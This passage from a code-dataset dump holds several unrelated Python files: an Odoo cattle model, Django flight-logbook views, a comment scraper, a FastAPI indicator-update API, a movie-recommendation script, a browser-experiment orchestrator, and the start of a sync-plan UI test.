kode_kelahiran = fields.Char('Kode Kelahiran')\n id_breed = fields.Char('ID Breed')\n nama_breed = fields.Char('Nama Breed')\n status_aktif = fields.Selection([\n ('a', 'Aktif'),\n ('ta', 'Tidak Aktif')\n ], string='Status Aktif')\n status_hidup = fields.Selection([\n ('h', 'Hidup'),\n ('m', 'Mati')\n ], string='Status Hidup')\n\n def func_kering(self):\n if self.state == 'kering':\n self.state = 'laktasi'\n\n def func_laktasi(self):\n if self.state == 'laktasi':\n self.state = 'kering'\n\n _sql_constraints = [(\n 'unique_gr_no',\n 'unique(gr_no)',\n 'GR Number must be unique per student!'\n )]\n\n @api.model\n def create(self, vals):\n vals['partner_id'] = self.env['res.partner'].create({\n 'name': vals.get('name'),\n 'is_sapi': True,\n 'company_type': 'person'\n }).id\n return super(sapi, self).create(vals)\n\n @api.onchange('first_name', 'middle_name', 'last_name')\n def _onchange_name(self):\n if not self.middle_name:\n self.name = str(self.first_name) + \" \" + str(\n self.last_name\n )\n else:\n self.name = str(self.first_name) + \" \" + str(\n self.middle_name) + \" \" + str(self.last_name)\n\n @api.constrains('birth_date')\n def _check_birthdate(self):\n for record in self:\n if record.birth_date > fields.Date.today():\n raise ValidationError(_(\n \"Birth Date can't be greater than current date!\"))\n\n def create_employee(self):\n for record in self:\n vals = {\n 'name': record.name,\n 'country_id': record.nationality.id,\n 'sex': record.sex,\n 'address_home_id': record.partner_id.id\n }\n emp_id = self.env['hr.employee'].create(vals)\n record.write({'emp_id': emp_id.id})\n record.partner_id.write({'partner_share': True, 'employee': True})\n","repo_name":"omikronkreatif/Kanjabungnew","sub_path":"addon_sapi/master_sapi/models/sapi.py","file_name":"sapi.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22679159052","text":"# django imports\nfrom django.shortcuts import redirect, render\nfrom django.db.models import Sum\nfrom django.forms.models import model_to_dict\n\n# directory imports\nfrom .models import *\nfrom .forms import *\nfrom .utilities import helper_mytimedelta\n\n\n\ndef add_flight(request): \n myFlight = FlightForm()\n if request.method == \"POST\":\n myFlight = FlightForm(request.POST)\n print(myFlight)\n if myFlight.is_valid():\n \n myFlight.save() \n return redirect (\"logo:logbook\")\n context ={'myFlight':myFlight}\n return render(request, \"logo/add_flight.html\", context)\n\ndef update_flight(request,pk):\n flight = Flight.objects.get(id=pk)\n myFlight = FlightForm(instance=flight)\n \n if request.method ==\"POST\":\n myFlight = FlightForm(request.POST, instance=flight) \n if myFlight.is_valid(): \n myFlight.save()\n return redirect(\"logo:logbook\")\n return render(request, \"logo/add_flight.html\", {'myFlight':myFlight})\n \ndef delete_flight(request,pk):\n flight = Flight.objects.get(id = pk)\n if request.method == \"POST\":\n flight.delete()\n return redirect('/')\n context = {'flight' : flight}\n return render(request, \"logo/delete_flight.html\", context)\n\n\ndef summary(request):\n # Total Hours calculation\n ttltimeobj = Flight.objects.aggregate(Sum('sectorTime'))\n ttltimeval = ttltimeobj['sectorTime__sum']\n total_hours = helper_mytimedelta(ttltimeval)\n\n # Total Night calculation\n ttlnighttimeobj = Flight.objects.aggregate(Sum('nightTime'))\n ttlnighttimeval = ttlnighttimeobj['nightTime__sum']\n total_night = helper_mytimedelta(ttlnighttimeval)\n\n context = {'total_hours':total_hours,'total_night': total_night}\n return render(request, \"logo/summary.html\",context)\n\ndef logbook(request):\n flights = Flight.objects.all()\n context = {'flights':flights}\n return render(request, \"logo/logbook.html\", context)\n\n\ndef flight_detail(request,pk):\n # method:1\n flight = FlightForm(data = model_to_dict(Flight.objects.get(id=pk)))\n # field_names = [f.name for f in Flight._meta.get_fields()]\n # print(field_names)\n #method:2\n # flight = get_object_or_404(Flight,id=pk)\n # class FlightView(ModelForm):\n # class Meta:\n # model=Flight\n # fields=['flight_date','flightNum','tailNum',\n # 'pilot', 'depApt', 'arrApt',\n # 'depTime','arrTime','nightTime','pilotrole',\n # 'p1Time','p2Time','dayTime','sectorTime']\n\n # form = FlightView(instance = flight)\n\n return render(request,\"logo/flight_detail.html\", {\n 'flight':flight\n })\n\ndef aircraft(request):\n aircrafts = Aircraft.objects.all()\n aircraftform = AircraftForm()\n\n if request.method =='POST':\n aircraftform = AircraftForm(request.POST)\n if aircraftform.is_valid():\n # aircraftform.clean()\n aircraftform.save()\n return redirect(\"logo:aircraft_list\")\n context = {\"aircrafts\" : aircrafts, 'aircraftform' :aircraftform}\n return render(request, \"logo/aircraft_list.html\", context)\n\ndef delete_aircraft(request,pk):\n aircraft = Aircraft.objects.get(id = pk)\n if request.method == \"POST\":\n aircraft.delete()\n return redirect('logo:aircraft_list')\n context ={\"aircraft\":aircraft}\n return render(request,\"logo/delete_aircraft.html\", context)\n\ndef update_aircraft(request,pk):\n aircraftobj = Aircraft.objects.get(id=pk)\n aircrafts = Aircraft.objects.all()\n aircraftform = AircraftForm(instance=aircraftobj)\n if request.method == 'POST':\n aircraftform = AircraftForm(request.POST, instance = aircraftobj)\n if aircraftform.is_valid():\n aircraftform.save()\n return redirect(\"logo:aircraft_list\")\n context = {\"aircrafts\":aircrafts, \"aircraftform\":aircraftform}\n return render(request, \"logo/aircraft_list.html\", context)\n\ndef people(request):\n people = People.objects.all()\n peopleform = PeopleForm()\n\n if request.method ==\"POST\":\n peopleform = PeopleForm(request.POST)\n if peopleform.is_valid():\n peopleform.save()\n return redirect(\"logo:people\")\n context = {\"people\":people, \"peopleform\":peopleform}\n return render(request, \"logo/people.html\",context)\n\ndef delete_person(request,pk):\n person = People.objects.get(id = pk)\n person.delete()\n return redirect(\"logo:people\")\n\ndef airport(request):\n airports = Airport.objects.all()\n airportform = AirportForm()\n\n if request.method ==\"POST\":\n airportform = AirportForm(request.POST)\n if airportform.is_valid():\n airportform.save()\n return redirect(\"logo:airport_list\")\n context = {\"airports\":airports, \"airportform\":airportform}\n return render(request, \"logo/airport_list.html\",context)\n\ndef delete_airport(request,pk):\n airport = Airport.objects.get(id = pk)\n if request.method == \"POST\":\n airport.delete()\n return redirect('logo:airport_list')\n context ={\"airport\":airport}\n return render(request,\"logo/delete_airport.html\", context)\n\ndef update_airport(request,pk):\n placeobj = Airport.objects.get(id=pk)\n airports = Airport.objects.all()\n airportform = AirportForm(instance=placeobj)\n if request.method == 'POST':\n airportform = AirportForm(request.POST, instance = placeobj)\n if airportform.is_valid():\n airportform.save()\n return redirect(\"logo:airport_list\")\n context = {\"airports\":airports, \"airportform\":airportform}\n return render(request, \"logo/airport_list.html\", context)","repo_name":"kulu88/logbook","sub_path":"logbook/logo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45616498445","text":"from django.shortcuts import render\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# Create your views here.\ndef index(request):\n if request.method == 'POST':\n flow_url = request.POST['flow_url']\n else:\n flow_url = \"https://the-flow.ru/features/vse-recenzii-na-oksimirona-krasota-i-urodstvo\"\n return render(request, \"sort_comments/index.html\", {'flow_url': flow_url})\n\n options = webdriver.ChromeOptions()\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n options.headless = True\n driver = webdriver.Chrome(options=options)\n driver.maximize_window()\n driver.get(flow_url)\n\n wait = WebDriverWait(driver, 15)\n wait.until(EC.frame_to_be_available_and_switch_to_it((By.CSS_SELECTOR, \"iframe[title='Disqus']\")))\n\n # changing wait time depending on comments count\n comment_count = int(driver.find_element(By.CLASS_NAME, \"comment-count\").text.split(\" Comments\")[0])\n if comment_count < 101:\n wait = WebDriverWait(driver, 5)\n elif comment_count > 1000:\n wait = WebDriverWait(driver, 30)\n\n while True:\n try:\n element = wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"load-more__button\")))\n element.click()\n except:\n break\n\n c = driver.page_source\n driver.quit()\n\n soup = BeautifulSoup(c, 'html.parser')\n comments = soup.find_all(\"div\", {\"class\": \"post-content\"})\n\n all_comments = []\n for article in comments:\n comment = {}\n # try/except для отлова удаленных комментариев\n try:\n comment[\"username\"] = article.find(\"span\", {\"class\": \"author publisher-anchor-color\"}).get_text()\n comment[\"user_url\"] = article.find(\"span\", {\"class\": \"author publisher-anchor-color\"}).a['href']\n comment[\"time\"] = \",\".join(article.find(\"a\", {\"class\": \"time-ago\"}).get(\"title\").split(\",\")[1:])\n content = article.find(\"div\", {\"data-role\": \"message\"}).find(\"a\", {\"class\": \"media-button-expand\"})\n if content:\n if content.get(\"href\").startswith(\"https://www.youtube.com/\"):\n comment[\"youtube_url\"] = content.get(\"href\").split(\"https://www.youtube.com/watch?v=\")[1].split('&')[0]\n comment[\"content_url\"] = None\n else:\n comment[\"youtube_url\"] = None\n comment[\"content_url\"] = content.get(\"href\")\n comment[\"raw_comment\"] = str(article.find(\"div\", {\"data-role\": \"message\"})).split(\n '
    = label.height() or bound.width() >= label.width()):\n fit = False;\n myFont.setPointSize(myFont.pointSize() - 1);\n break;\n myFont.setPointSize(myFont.pointSize() + 1);\n tmp.setFont(myFont);\n\n label.setFont(myFont);\n label.setText(string); \n #print(myFont.pointSize());\n","repo_name":"yycho0108/OlinSchedulerPy","sub_path":"CourseObject.py","file_name":"CourseObject.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28405286733","text":"\"\"\"A simple websocket python client.\n\"\"\"\nimport asyncio\nimport websockets\nimport time\n\nurl = \"ws://localhost:8100/bench/websocket\"\n\n\nasync def listen():\n counter = 0\n t_0 = time.time_ns()\n async with websockets.connect(url) as websocket:\n async for message in websocket:\n counter += 1\n delta_t = time.time_ns() - t_0\n duration = delta_t/1000000000\n average = int(delta_t / counter)\n\n print(f\"Messages: {counter:>13}\")\n print(f\"Duration: {duration:>11.3f} s\")\n print(f\"Average: {average:>10} ns\")\n\n\nasyncio.get_event_loop().run_until_complete(listen())\n","repo_name":"CharlyCst/js-py-ipc-bench","sub_path":"websocket/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1991980279","text":"\"\"\"\nAPI for tracking updated indicators for Tracking Progress.\n\nFront end form on the intranet enables adding and removing the names of indicators that have been\nupdated.\n\nThe GET endpoint returns a list of indicators updated in the past 30 days so the TP app can display\na UI element on the indicator to represent that.\n\"\"\"\nimport datetime\nfrom typing import List\nfrom typing_extensions import Annotated\nimport secrets\n\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import JSONResponse\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nimport psycopg\nfrom pydantic import BaseModel\n\nfrom config import PG_CREDS, USERNAME, PASSWORD\n\n\nclass Indicator(BaseModel):\n name: str\n\n\nclass Message(BaseModel):\n message: str\n\n\nPATH = \"/api/tp-updates/v1\"\n\napp = FastAPI(\n title=\"Tracking Progress Updates API\",\n openapi_url=PATH + \"/openapi.json\",\n docs_url=PATH + \"/docs\",\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\n \"http://linux3.dvrpc.org\",\n \"http://linux4.dvrpc.org\",\n \"http://intranet.dvrpc.org\",\n \"http://staging.dvrpc.org\",\n \"https://staging.dvrpc.org\",\n \"https://dvrpc.org\",\n \"https://www.dvrpc.org\",\n ],\n allow_credentials=True,\n allow_methods=[\"GET\", \"POST\", \"DELETE\"],\n allow_headers=[\"*\"],\n)\n\nsecurity = HTTPBasic()\n\n\ndef basic_auth(credentials: Annotated[HTTPBasicCredentials, Depends(security)]):\n \"\"\"\n Create a simple verification method using Basic HTTP Authentication.\n In any HTTP request, use the Basic Auth Authorization header to provide a username and password,\n which will be validated against the environment variables in config.py.\n This fn can be used in an endpoint to add authentication to it. See the POST and DELETE\n endpoints below.\n \"\"\"\n is_correct_username = secrets.compare_digest(\n credentials.username.encode(\"utf8\"), USERNAME.encode(\"utf8\")\n )\n is_correct_password = secrets.compare_digest(\n credentials.password.encode(\"utf8\"), PASSWORD.encode(\"utf8\")\n )\n if not (is_correct_username and is_correct_password):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect email or password\",\n headers={\"WWW-Authenticate\": \"Basic\"},\n )\n return\n\n\ndef db():\n \"\"\"\n Create connection to database.\n\n Using a function so that we can insert it as a dependency, and thus use a different\n database connection when testing.\n \"\"\"\n return psycopg.connect(PG_CREDS)\n\n\n@app.get(\n PATH + \"/indicators\",\n responses={500: {\"model\": Message, \"description\": \"Internal Server Error\"}},\n response_model=List[str],\n)\ndef get_indicators(db=Depends(db)):\n \"\"\"Return list of all indicators that have been updated in past 30 days.\"\"\"\n one_month_ago = datetime.date.today() - datetime.timedelta(days=30)\n\n try:\n with db as conn:\n results = conn.execute(\n \"SELECT * FROM updates WHERE updated >= %s\", [one_month_ago]\n ).fetchall()\n except psycopg.Error as e:\n return JSONResponse(status_code=500, content={\"message\": \"Database error: \" + str(e)})\n\n if not results:\n return []\n\n indicators = []\n for row in results:\n indicators.append(row[1])\n\n return list(set(indicators))\n\n\n@app.post(\n PATH + \"/indicators\",\n responses={500: {\"model\": Message, \"description\": \"Internal Server Error\"}},\n status_code=201,\n response_model=Message,\n)\ndef add_indicator(\n username: Annotated[str, Depends(basic_auth)], indicator: Indicator, db=Depends(db)\n):\n \"\"\"Add updated indicator.\"\"\"\n try:\n with db as conn:\n cur = conn.execute(\"INSERT INTO updates (indicator) VALUES (%s)\", [indicator.name])\n\n except psycopg.Error as e:\n return JSONResponse(status_code=500, content={\"message\": \"Database error: \" + str(e)})\n\n if cur.statusmessage != \"INSERT 0 1\":\n return JSONResponse(\n status_code=500,\n content={\"message\": \"Error inserting indicator, contact developer.\"},\n )\n\n return {\"message\": \"success\"}\n\n\n@app.delete(\n PATH + \"/indicators\",\n responses={\n 404: {\"model\": Message, \"description\": \"Not Found\"},\n 500: {\"model\": Message, \"description\": \"Internal Server Error\"},\n },\n response_model=Message,\n)\ndef delete_indicator(\n username: Annotated[str, Depends(basic_auth)], indicator: Indicator, db=Depends(db)\n):\n \"\"\"Delete an updated indicator (in case one was mistakenly added).\"\"\"\n\n try:\n with db as conn:\n cur = conn.execute(\"DELETE FROM updates WHERE indicator = %s\", [indicator.name])\n except psycopg.Error as e:\n return JSONResponse(status_code=500, content={\"message\": \"Database error: \" + str(e)})\n\n if \"DELETE\" in cur.statusmessage:\n if cur.statusmessage == \"DELETE 0\":\n return JSONResponse(\n status_code=404,\n content={\"message\": \"No indicator with that name found; not deleted.\"},\n )\n return {\"message\": \"success\"}\n\n return JSONResponse(\n status_code=500,\n content={\"message\": \"Error inserting indicator, contact developer.\"},\n )\n","repo_name":"dvrpc/tp-updates","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40340071691","text":"\n# Generating features\n\n\n# Set working directory\nimport sys\nsys.path.append('../scraping')\nsys.path.append('../tools')\nimport db_connect\nimport math\n\nimport pandas as pd\nimport numpy as np\n\n\n\n\n# Define Database connection detail\ndb_credential = ['../../connection-details/db-reco-engine.credential',\n 'reco-engine', 'production']\n# Get data from Database\ncol = db_connect.get_collection(db_credential)\n\n# Data Manipulation\ndf = pd.DataFrame(list(col.find({})))\n\n#print(df.iloc[8])\n\n#a = df.iloc[55]\n#type(df['Audience_Score_ur'][1])\n\n\n# Audience Score\n# Converting str into value between 0 and 1\ndf['Audience_Score'].fillna('0', inplace=True)\ndf['Audience_Score'] = pd.to_numeric(df['Audience_Score'].str.replace('%', ''), errors = 'coerce')/100\n\n\n# Tomatometer\n# Converting str into value between 0 and 1\ndf['Tomato_Meter'].fillna('0', inplace=True)\ndf['Tomato_Meter'] = pd.to_numeric(df['Tomato_Meter'].str.replace('%', ''), errors = 'coerce')/100\n\n\n# Movie Year\n# Creating a new variable 'Movie_Yr' and applying minmax scaling\ndf['Movie_Yr'] = 1900\nfor i in range(len(df['_id'])):\n try:\n df.loc[i, 'Movie_Yr'] = pd.to_numeric(df.loc[i, 'MI_In_Theaters_1'][-4:], errors = 'coerce')\n except:\n try:\n df.loc[i, 'Movie_Yr'] = pd.to_numeric(df.loc[i, 'MI_On_Disc_1'][-4:], errors = 'coerce')\n except:\n df.loc[i, 'Movie_Yr'] = 1900\n \nyr_max = max(df['Movie_Yr'])\nyr_min = min(df['Movie_Yr'])\ndf['Scaled_Movie_Yr'] = 0.000\nfor i in range(len(df['_id'])):\n df.loc[i, 'Scaled_Movie_Yr'] = (df.loc[i, 'Movie_Yr'] - yr_min)/(yr_max - yr_min)\n\n\n# Runtime\n# Creating a new variable 'Runtime' and applying minmax scaling\ndf['Runtime'] = pd.to_numeric(df['MI_Runtime_1'].str.replace(' minutes', ''), errors = 'coerce')\nfor i in range(len(df['_id'])):\n if df.loc[i, 'Runtime'] > 300:\n df.loc[i, 'Runtime'] = 300\n\nruntime_max = max(df['Runtime'])\nruntime_min = min(df['Runtime'])\ndf['Scaled_Runtime'] = 0.000\nfor i in range(len(df['_id'])):\n df.loc[i, 'Scaled_Runtime'] = (df.loc[i, 'Runtime'] - runtime_min)/(runtime_max - runtime_min)\n\n\n# Franchise\n# Replacing NaNs with 0 first \ndf['Franchise'].fillna(0, inplace=True)\n# Replacing non-0 values with 1 since they are a part of a franchise\nfor i in range(len(df['_id'])):\n if df.loc[i, 'Franchise'] != 0:\n df.loc[i, 'Franchise'] = 1\n \n#df['Franchise'].value_counts()\n\n\n# Movie Rating (to be used in conjunction with Genre)\n# Removing the extra content within parenthesis that explains the basis for the rating\ndf['MI_Rating'] = df['MI_Rating'].str.replace(r'\\s+\\(.*\\)','')\n\n\n# Cleaning up cast names\n# Firstly, replacing the NaNs with 0s\ndf['Casts'].fillna(0, inplace = True)\n\n# Secondly, removing the on-screen character names from the list\n# and also adding the new resulting cast list to the dataframe\ndf['Updated_Cast'] = 0\nfor i in range(len(df['_id'])):\n if df.loc[i, 'Casts'] != 0:\n cast_per_movie = list()\n for j in range(len(df['Casts'][i])):\n cast_per_movie.append(df['Casts'][i][j][0])\n df.loc[i, 'Updated_Cast'] = ', '.join(cast_per_movie)\n\n\n# Creating dummy variables for Genres\n# Using a temporary df to hold the dummies\ndf_temp = pd.get_dummies(df['MI_Genre'].apply(pd.Series).stack(), prefix='Genre').sum(level = 0)\ndf_final = pd.concat([df, df_temp], axis = 1)\n\n# Keeping only the required columns\n# Defining the variable cols to hold the required columns\ncols_v2 = ['Audience_Score', 'Franchise', 'Tomato_Meter', 'Scaled_Runtime', 'Scaled_Movie_Yr',\n 'Genre_1.0', \n 'Genre_2.0', \n 'Genre_3.0', \n 'Genre_4.0', \n 'Genre_5.0', \n 'Genre_6.0', \n 'Genre_7.0', \n 'Genre_8.0', \n 'Genre_9.0', \n 'Genre_10.0', \n 'Genre_11.0', \n 'Genre_12.0', \n 'Genre_13.0', \n 'Genre_14.0', \n 'Genre_15.0', \n 'Genre_16.0', \n 'Genre_17.0', \n 'Genre_18.0', \n 'Genre_19.0', \n 'Genre_20.0', \n 'Genre_21.0']\n\ndf_knn_v2 = df_final[cols_v2]\n\n# function for knn\n# sckit-learn algo here\n\n# custom knn from scratch\n# function to calculate distance between 2 instances\n# function to return top 5 neighbors depending on the input\n# https://machinelearningmastery.com/tutorial-to-implement-k-nearest-neighbors-in-python-from-scratch/\n# **** this is python 2 ****\n\n\n\ndef get_dist(df_record1, df_record2):\n return math.sqrt(sum((df_record1 - df_record2)**2))\n \n \ndef get_neighbors(test_instance, df, k):\n length_df = len(df)\n distances = list()\n for i in range(length_df):\n distances.append(get_dist(test_instance, df.iloc[i]))\n \n indices = list(np.array(distances).argsort()[1:k]) \n \n return indices\n \n\ntest_index = 11150\nrecos = 4\ntest_instance = df_knn_v2.iloc[test_index]\nind = get_neighbors(test_instance, df_knn_v2, recos)\n\nprint('\\nInput:' + df.loc[test_index, 'Movie_Name'])\nprint('\\nRecommendations:')\nfor i in ind:\n print(df.loc[i, 'Movie_Name'])\n\n\n# add some context of the movie\n# - maybe extract topics from description and then compare?\n\n\n\n \n \n \n\n\n# =============================================================================\n# \n# # variables for knn\n# Audience_Score - done\n# Franchise - done\n# MI_Rating 'dummy??????????\n# Tomato_Meter - done\n# Scaled_Runtime - done\n# Genre 'dummy\n# Need to bring in cast as well \n# \n# \n# =============================================================================\n\n\n\n\n\n\n\n################################################################################################\n\n########## Idea: Similarity algorithm ##########\n# Ask for 3 movies that user has seen recently as input\n# Find a movie closest from all 3\n# Find an upcoming movie closest from all 3 (use subset of data by filtering on In_Theatres_Date)\n################################################\n\n########## Idea: Collaborative Filtering algorithm ##########\n# Create user profiles (pre defined) (as future scope look into the ability to letting users select movies)\n# Let user pick a profile\n# Suggest 2-3 movies as recommendations\n################################################\n\n########## Idea: Similar Description ##########\n# Ask for 3 movies that user has seen recently as input\n# Find a movie description closest from all 3\n# Dice's coefficient can be used to find similarity. or even cosine similarity of tf-idf\n################################################\n \n################################################################################################\n","repo_name":"calvin-and-smit/movie-reco-engine","sub_path":"code/feature-gen/feature_gen_v1_2.py","file_name":"feature_gen_v1_2.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30992429206","text":"import logging\n\nfrom dotenv import load_dotenv\n\nfrom analysis.plot_factory import PlotFactory\nfrom bci.configuration import Global\nfrom bci.database.mongo.mongodb import MongoDB, ServerException\nfrom bci.distribution.worker_manager import WorkerManager\nfrom bci.evaluations.custom.custom_evaluation import CustomEvaluationFramework\nfrom bci.evaluations.evaluation_framework import EvaluationFramework\nfrom bci.evaluations.logic import (DatabaseConnectionParameters,\n EvaluationParameters, PlotParameters,\n SequenceConfiguration, WorkerParameters)\nfrom bci.evaluations.outcome_checker import OutcomeChecker\nfrom bci.evaluations.samesite.samesite_evaluation import \\\n SameSiteEvaluationFramework\nfrom bci.evaluations.xsleaks.evaluation import XSLeaksEvaluation\nfrom bci.search_strategy.composite_search import CompositeSearch\nfrom bci.search_strategy.n_ary_search import NArySearch\nfrom bci.search_strategy.n_ary_sequence import NArySequence, SequenceFinished\nfrom bci.search_strategy.sequence_strategy import SequenceStrategy\nfrom bci.version_control import state_factory\nfrom bci.version_control.states.state import State\n\nlogger = logging.getLogger(__name__)\n\n\nclass Master:\n\n def __init__(self):\n self.running = False\n\n self.stop_gracefully = False\n self.stop_forcefully = False\n\n self.evaluations = []\n self.evaluation_framework = None\n self.worker_manager = None\n self.available_evaluation_frameworks = {}\n\n self.firefox_build = None\n self.chromium_build = None\n\n load_dotenv()\n\n Global.initialize_folders()\n self.db_connection_params = Global.get_database_connection_params()\n self.connect_to_database(self.db_connection_params)\n self.inititialize_available_evaluation_frameworks()\n logger.info(\"BugHog is ready!\")\n\n def connect_to_database(self, db_connection_params: DatabaseConnectionParameters):\n try:\n MongoDB.connect(db_connection_params)\n except ServerException:\n logger.error(\"Could not connect to database.\", exc_info=True)\n\n def run(self, eval_params: EvaluationParameters):\n self.running = True\n self.stop_gracefully = False\n self.stop_forcefully = False\n\n browser_config = eval_params.browser_configuration\n evaluation_config = eval_params.evaluation_configuration\n evaluation_range = eval_params.evaluation_range\n sequence_config = eval_params.sequence_configuration\n\n logger.info(f'Running experiments for {browser_config.browser_name} ({\", \".join(evaluation_range.mech_groups)})')\n self.evaluation_framework = self.get_specific_evaluation_framework(\n evaluation_config.project\n )\n worker_manager = WorkerManager(sequence_config.nb_of_containers)\n\n try:\n state_list = state_factory.get_state_list(browser_config, evaluation_range)\n\n search_strategy = self.parse_search_strategy(\n sequence_config.search_strategy, state_list, 2, sequence_config.sequence_limit\n )\n\n outcome_checker = OutcomeChecker(sequence_config)\n\n # The state_lineage is put into self.evaluation as a means to check on the process through front-end\n self.evaluations.append(state_list)\n\n try:\n current_state = search_strategy.next()\n while (self.stop_gracefully or self.stop_forcefully) is False:\n worker_params = eval_params.create_worker_params_for(current_state, self.db_connection_params)\n\n # Callback function for sequence strategy\n update_outcome = self.get_update_outcome_cb(search_strategy, worker_params, sequence_config, outcome_checker)\n\n # Check whether state is already evaluated\n if self.evaluation_framework.has_all_results(worker_params):\n logger.info(f\"State '{current_state.revision_number}' already evaluated.\")\n update_outcome()\n current_state = search_strategy.next()\n continue\n\n # Start worker to perform evaluation\n worker_manager.start_test(worker_params, update_outcome)\n\n current_state = search_strategy.next()\n except SequenceFinished:\n logger.debug(\"Last experiment has started\")\n\n except Exception as e:\n logger.critical(\"A critical error occurred\", exc_info=True)\n raise e\n finally:\n # Gracefully exit\n if self.stop_gracefully:\n logger.info(\"Gracefully stopping experiment queue due to user end signal...\")\n if self.stop_forcefully:\n logger.info(\"Forcefully stopping experiment queue due to user end signal...\")\n worker_manager.forcefully_stop_all_running_containers()\n else:\n logger.info(\"Gracefully stopping experiment queue since last experiment started.\")\n # MongoDB.disconnect()\n logger.info(\"Waiting for remaining experiments to stop...\")\n worker_manager.wait_until_all_evaluations_are_done()\n logger.info(\"BugHog has finished the evaluation!\")\n self.running = False\n\n @staticmethod\n def get_update_outcome_cb(search_strategy: SequenceStrategy, worker_params: WorkerParameters, sequence_config: SequenceConfiguration, checker: OutcomeChecker) -> None:\n def cb():\n if sequence_config.target_mech_id is not None and len(worker_params.mech_groups) == 1:\n result = MongoDB.get_instance().get_result(worker_params.create_test_params_for(worker_params.mech_groups[0]))\n outcome = checker.get_outcome(result)\n search_strategy.update_outcome(worker_params.state, outcome)\n return cb\n\n def inititialize_available_evaluation_frameworks(self):\n self.available_evaluation_frameworks[\"samesite\"] = SameSiteEvaluationFramework()\n self.available_evaluation_frameworks[\"custom\"] = CustomEvaluationFramework()\n self.available_evaluation_frameworks[\"xsleaks\"] = XSLeaksEvaluation()\n\n @staticmethod\n def parse_search_strategy(search_strategy_option: str, state_list: list[State], n: int, sequence_limit: int):\n if search_strategy_option == \"bin_seq\":\n return NArySequence(state_list, n, limit=sequence_limit)\n if search_strategy_option == \"bin_search\":\n return NArySearch(state_list, n)\n if search_strategy_option == \"comp_search\":\n return CompositeSearch(state_list, n, sequence_limit, NArySequence, NArySearch)\n raise AttributeError(\"Unknown search strategy option '%s'\" % search_strategy_option)\n\n def get_specific_evaluation_framework(self, evaluation_name: str) -> EvaluationFramework:\n # TODO: we always use 'custom', in which evaluation_name is a project\n evaluation_name = 'custom'\n if evaluation_name not in self.available_evaluation_frameworks.keys():\n raise AttributeError(\"Could not find a framework for '%s'\" % evaluation_name)\n return self.available_evaluation_frameworks[evaluation_name]\n\n def activate_stop_gracefully(self):\n if self.evaluation_framework:\n self.stop_gracefully = True\n self.evaluation_framework.stop_gracefully()\n logger.info(\"Received user signal to gracefully stop.\")\n else:\n logger.info(\"Received user signal to gracefully stop, but no evaluation is running.\")\n\n def activate_stop_forcefully(self):\n if self.evaluation_framework:\n self.stop_forcefully = True\n self.evaluation_framework.stop_gracefully()\n logger.info(\"Received user signal to forcefully stop.\")\n else:\n logger.info(\"Received user signal to forcefully stop, but no evaluation is running.\")\n\n def get_html_plot(self, params: PlotParameters) -> tuple[str, int]:\n return PlotFactory.create_html_plot_string(params, MongoDB.get_instance())\n","repo_name":"DistriNet/BugHog","sub_path":"bci/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"38460192096","text":"\"\"\"Test class for Sync Plan UI\n\n:Requirement: Syncplan\n\n:CaseAutomation: Automated\n\n:CaseLevel: Acceptance\n\n:CaseComponent: UI\n\n:TestType: Functional\n\n:CaseImportance: High\n\n:Upstream: No\n\"\"\"\n\nfrom datetime import datetime, timedelta\nfrom fauxfactory import gen_string\nfrom nailgun import entities\nfrom random import choice\nfrom robottelo import manifests\nfrom robottelo.api.utils import (\n enable_rhrepo_and_fetchid,\n wait_for_tasks,\n wait_for_syncplan_tasks\n)\nfrom robottelo.constants import PRDS, REPOS, REPOSET, SYNC_INTERVAL\nfrom robottelo.datafactory import (\n filtered_datapoint,\n generate_strings_list,\n invalid_values_list,\n)\nfrom robottelo.decorators import (\n run_in_one_thread,\n run_only_on,\n skip_if_bug_open,\n stubbed,\n tier1,\n tier2,\n tier3,\n tier4,\n upgrade,\n)\nfrom robottelo.test import UITestCase\nfrom robottelo.ui.factory import make_syncplan\nfrom robottelo.ui.locators import common_locators, locators, tab_locators\nfrom robottelo.ui.session import Session\nfrom time import sleep\n\n\n@filtered_datapoint\ndef valid_sync_intervals():\n \"\"\"Returns a list of valid sync intervals\"\"\"\n return [\n SYNC_INTERVAL['hour'],\n SYNC_INTERVAL['day'],\n SYNC_INTERVAL['week'],\n ]\n\n\nclass SyncPlanTestCase(UITestCase):\n \"\"\"Implements Sync Plan tests in UI\"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(SyncPlanTestCase, cls).setUpClass()\n cls.organization = entities.Organization().create()\n\n @staticmethod\n def validate_task_status(repo_id, max_tries=10, repo_backend_id=None):\n \"\"\"Wait for Pulp and foreman_tasks to complete or timeout\n\n :param repo_id: Repository Id to identify the correct task\n :param max_tries: Max tries to poll for the task creation\n :param repo_backend_id: Backend identifier of repository to filter the\n pulp tasks\n \"\"\"\n if repo_backend_id:\n wait_for_syncplan_tasks(repo_backend_id)\n wait_for_tasks(\n search_query='resource_type = Katello::Repository'\n ' and owner.login = foreman_admin'\n ' and 